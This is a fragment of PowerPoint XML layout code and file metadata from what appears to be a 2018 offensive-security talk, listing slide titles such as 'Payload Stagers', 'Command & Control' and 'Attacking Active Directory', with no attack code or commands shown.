            <a:ext cx="914400" cy="9144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FC9B4B5D-6991-4AE3-831F-E2FE714036D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9551441" y="633960"/>
            <a:ext cx="2033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Payload Stagers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6B1060-58F6-4320-A85B-9E6A98ECB173}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="495147" y="830941"/>
            <a:ext cx="0" cy="2600538"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="41275">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:headEnd type="none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603BC8A-F02E-43A6-B716-AF5245810F6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="495150" y="830941"/>
            <a:ext cx="8460167" cy="7952"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="41275">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:headEnd type="none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14F4B8-E12E-4509-83D7-31C89A657033}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="10158238" y="3546400"/>
            <a:ext cx="610659" cy="26512"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:headEnd type="none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FA9A1C7-645C-42BD-B20B-36103FB8B7DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9552937" y="2591047"/>
            <a:ext cx="27426" cy="671992"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:headEnd type="none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FBF384B-CA07-4BBE-AC9D-C39568DEEB23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872655" y="2636701"/>
            <a:ext cx="1152682" cy="636305"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:headEnd type="none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0594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27317</TotalTime>
  <Words>4281</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>816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Century Gothic</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Titillium Web</vt:lpstr>
      <vt:lpstr>Titillium WebRegular</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Ion</vt:lpstr>
      <vt:lpstr>  Ryan Preston ~ Depth Security  Slides: https://github.com/h3xg4m3s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Command &amp; Control</vt:lpstr>
      <vt:lpstr>Command &amp; Control</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>CLUB AD</vt:lpstr>
      <vt:lpstr>Bloodhound / Sharphound</vt:lpstr>
      <vt:lpstr>Bloodhound|Sharphound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Lateral Movement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Attacking Active Directory</vt:lpstr>
      <vt:lpstr>Ryan Preston ~ Depth Security   Teaching an XSS Workshop at Bsides KC on 4/20     --- adding new spots soon!  https://bsideskc2018.busyconf.com/bookings/new</vt:lpstr>
      <vt:lpstr>  Ryan Preston ~ Depth Security  Send me feedback!  Slides: https://github.com/h3xg4m3s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Preston</dc:creator>
  <cp:lastModifiedBy>Ryan Preston</cp:lastModifiedBy>
  <cp:revision>266</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-11-07T16:34:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-14T14:05:34Z</dcterms:modified>
</cp:coreProperties>
</file>